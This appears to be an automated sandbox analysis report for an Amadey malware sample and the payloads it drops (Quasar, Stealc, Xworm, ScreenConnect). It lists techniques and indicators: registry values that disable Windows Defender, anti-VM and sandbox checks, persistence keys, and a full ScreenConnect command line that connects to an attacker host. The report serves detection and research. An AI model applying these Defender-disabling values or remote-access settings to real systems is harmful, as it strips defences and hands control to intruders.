amadey | a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	ae9ab2f9a7.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ae9ab2f9a7.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ae9ab2f9a7.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	ae9ab2f9a7.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/1696-121-0x000000000C850000-0x000000000C9A4000-memory.dmp	family_quasar
behavioral2/memory/1696-122-0x000000000C9D0000-0x000000000C9EA000-memory.dmp	family_quasar

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2983c11b74.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	05be0399a2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0af0a2f978.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1310185143.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	88e128475c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ae9ab2f9a7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	50981a7f32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e2a57b0b34.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e9ea3a76fa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8ffa067850.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 6 IoCs

flow	pid	Process
14	3004	powershell.exe
51	1696	powershell.exe
63	1696	powershell.exe
129	1696	powershell.exe
255	1696	powershell.exe
376	1696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3004	powershell.exe
1696	powershell.exe
1496	PowerShell.exe
5056	powershell.exe
2084	powershell.exe
4684	powershell.exe
2148	powershell.exe
2692	powershell.exe
5640	powershell.exe
6348	powershell.exe
1300	powershell.exe
1456	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 17 IoCs

flow	pid	Process
139	2324	rapes.exe
139	2324	rapes.exe
139	2324	rapes.exe
14	3004	powershell.exe
124	4324	futors.exe
136	4324	futors.exe
90	4324	futors.exe
245	4324	futors.exe
245	4324	futors.exe
109	4324	futors.exe
319	2324	rapes.exe
391	2324	rapes.exe
29	2324	rapes.exe
29	2324	rapes.exe
76	2324	rapes.exe
76	2324	rapes.exe
76	2324	rapes.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
3476	takeown.exe
4568	icacls.exe
4308	takeown.exe
4320	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=d1968bf2-fc89-4cfc-baae-f9f7dd88acf1&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAFh8gVlHqbEmH0zDp3ue2XwAAAAACAAAAAAAQZgAAAAEAACAAAAC6TKv1jtFFQT3yH%2fBl7f8kigXS3zrmwKewyYttuSj5bwAAAAAOgAAAAAIAACAAAAAq5GrWxMyssSgWCR8DdrHxePUWD8nxOlxSCstVDlBEhKAEAACN%2fp0tk9iWH5BrMd191SYwFtdxhdvymA%2bCSRTs67VbFmw2n0xGjXAavv72BQGWBeovIkOEsJAIoes5FOcbb4xKNGhsaUOt8MSLugX%2f0v%2f7qj5vJ2nHlvx4ofWFEpCNyuSO61j8pQw%2fCKvKx5J%2bUFhGro9Fh3v%2bcZR5ZHgn3oNDhFuKjCXP3z1AzrgnugTe8KAxe1em3l3q99pA48cXmJs5F2RZk%2bfMd1NXoTmbZUWbuUVVv9nTG4Yf%2fX1jZ1fzp7H5vLZkUDQPeBpbfKjJ6VqXwRczLTn3xcU5t6%2fg5H9fNR3%2bsdGLKjO1n3A5rucEgxKHXU6VV30xT5%2bdaxQpWBd8D7GwTHLKAQ3NLZ0eg5QSnJnZyok4mSQnOLg%2b310ZOZIEYs8GdGAx6IA28lK3y7jcPdC6nZEe1pCpDz41clmk%2bvZbwEO%2b0XsvKFApPerlqQh5SceVUvTL9CpXD79yvEZHzfjTNs554Xs4r53oka1oSnxY00oUvaV%2f2csSvIcJI6ptS7%2f2H45a768X5VI6jeH%2bai3yxYTNxK08mA24blfblxj6uK1Ze%2b9%2bkLtja5PxVlYefqypdN%2bYcjEGHjsFVQpu7K64dmVFGy494Tx3mJ1UvTVnUdN0HFGIhcxpXya2zSI08oOAT7s0YLD0sB%2bjTV0jBNuJV0ABq2nW3AWM%2btsSO%2byni1LVQmGxbXsXboFEiPkHmiUSseNxKizaDuNHCVIFg4EHwte5CWvScpIisXjz4%2b4HtLoZ8f5PUvj2dHam1z0BkXW0gSHIMAq1%2f01FQDXwIDZViWWZlcoIldtDt83Spiyh%2fSooCbfAmamTB0W12E7imwgACWcotGSJZ8nzy8mUdOdtxbr8mrHnQn8fd13HxGl%2bPeH%2f2H8w1JYU5gxBSB4YJ1ErLh7ZFKqEKT2Nyf6JN0udO5WX3KeczxcOS3w8kJf%2fy9yD1pQa%2b7FGmnRkRTAltsaPTNM5q0lGQFLoK5H8r9mpJZig%2bYhwR%2bKyMjSLEOqBTNYFVOfWQbsSsB%2f8L9aU%2fYWTV7V06FpdOUSf1D%2bldZ0awiOdrkpFP3TFGLXqORSWCq3jdy5L4rbkkb%2fEZuiKpRWaXMakK84EZe1Q5ztqj0Yji4iq6IcMMnadGNFgcYH82GZWcqqZlMbTI7P0ovvq%2b7Fv4VYideY57G%2b2hzp4onqrLnRfWrOxSeUq7ZEGo8eh5cD6PV%2fw%2fzAND0fjINKL%2bVrTawQQqzJj6TwvEfvAyo0lHIcdbDmhaDyiOx%2bNQiLzvprJge3tasDmZBpYtrp%2f7MkG8%2ftDlhXArcP35mEI%2bUc5pjQCMG7m3m%2fiXBD3jHSWiU7I98hLW4Z9lz55WUR%2fRnpaxZXcUnTr%2b53aMS%2fmlTpycdeg2PxEKbaoez2OAxLifZ34r0OgDdoU1I5aN%2b5IIDxI8kmlonMdxiKY0h3VeMbS2eGFQfHbAw5cN6iDUAVKHHGLJu4f6G2SHluZ9GhRFZ6QzDVDTnLPJgs%2fy%2besgSkvisukfJoFDdlDLVzop6%2f1Fr0qf5RQJQOzunJi%2fkwE1V66aXEu71NzpNLJikbAHjUzkB4nfOszeHPsqrJORkAAAACapLFUhtkjNXwDp7hWo7Z3V0zp23hMUUQ%2fasUGKAv1On%2fx2XNdAgN3I8WUxhUQ86RXvYrYn3SC2itFuGYjeT2f&t=30march\""	ScreenConnect.ClientService.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x00080000000242b6-424.dat	net_reactor
behavioral2/memory/1348-437-0x00000000009F0000-0x0000000000A18000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 30 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8ffa067850.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0af0a2f978.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	50981a7f32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1310185143.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e9ea3a76fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e9ea3a76fa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2983c11b74.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	88e128475c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ae9ab2f9a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2983c11b74.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	05be0399a2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ae9ab2f9a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	50981a7f32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e2a57b0b34.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1310185143.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0af0a2f978.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8ffa067850.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e2a57b0b34.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	88e128475c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	05be0399a2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	7d5ce09794.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	NP4kBrG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	221.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	A9cowK5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	A9cowK5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	amnew.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk	NP4kBrG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk	NP4kBrG.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 52 IoCs

pid	Process
1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
2324	rapes.exe
1040	rapes.exe
972	7d5ce09794.exe
2512	221.exe
3856	221.exe
2544	A9cowK5.exe
212	kO2IdCz.exe
4028	apple.exe
2252	221.exe
2148	221.exe
3752	amnew.exe
4324	futors.exe
4384	ScreenConnect.ClientService.exe
4728	ScreenConnect.WindowsClient.exe
4196	ScreenConnect.WindowsClient.exe
2880	e9ea3a76fa.exe
1332	gron12321.exe
1348	NP4kBrG.exe
2824	v7942.exe
4912	rapes.exe
3368	futors.exe
1764	alex1dskfmdsf.exe
4268	2983c11b74.exe
3968	smss.exe
2856	Bell_Setup16.exe
4028	Bell_Setup16.tmp
3196	Bell_Setup16.exe
2512	Bell_Setup16.tmp
2856	05be0399a2.exe
444	7ef3f93a66.exe
5460	ae9ab2f9a7.exe
5192	bot.exe
6312	bot.exe
6660	0af0a2f978.exe
7060	50981a7f32.exe
5824	389dc2db95.exe
6500	svchost015.exe
6540	8ffa067850.exe
6712	svchost015.exe
2532	e2a57b0b34.exe
5980	e269e6c0d6.exe
4008	svchost015.exe
6288	1310185143.exe
7012	svchost015.exe
7088	842890bd89.exe
5460	88e128475c.exe
6736	A9cowK5.exe
6140	rapes.exe
3268	futors.exe
7060	EPTwCQd.exe
4700	smss.exe

Identifies Wine through registry keys 2 TTPs 15 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	2983c11b74.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	1310185143.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	ae9ab2f9a7.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	8ffa067850.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	e2a57b0b34.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	88e128475c.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	e9ea3a76fa.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	05be0399a2.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	0af0a2f978.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	50981a7f32.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe

Loads dropped DLL 34 IoCs

pid	Process
4840	MsiExec.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4568	rundll32.exe
4320	MsiExec.exe
4128	MsiExec.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
4384	ScreenConnect.ClientService.exe
3468	regsvr32.exe
5988	MsiExec.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
3220	rundll32.exe
4976	MsiExec.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3476	takeown.exe
4568	icacls.exe
4308	takeown.exe
4320	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	ae9ab2f9a7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	ae9ab2f9a7.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae9ab2f9a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381480101\\ae9ab2f9a7.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e269e6c0d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10045220101\\e269e6c0d6.exe"	futors.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	kO2IdCz.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smss.exe"	NP4kBrG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2983c11b74.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381450101\\2983c11b74.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\05be0399a2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381460101\\05be0399a2.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7ef3f93a66.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381470101\\7ef3f93a66.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00080000000242d8-699.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.tmp	ScreenConnect.ClientService.exe
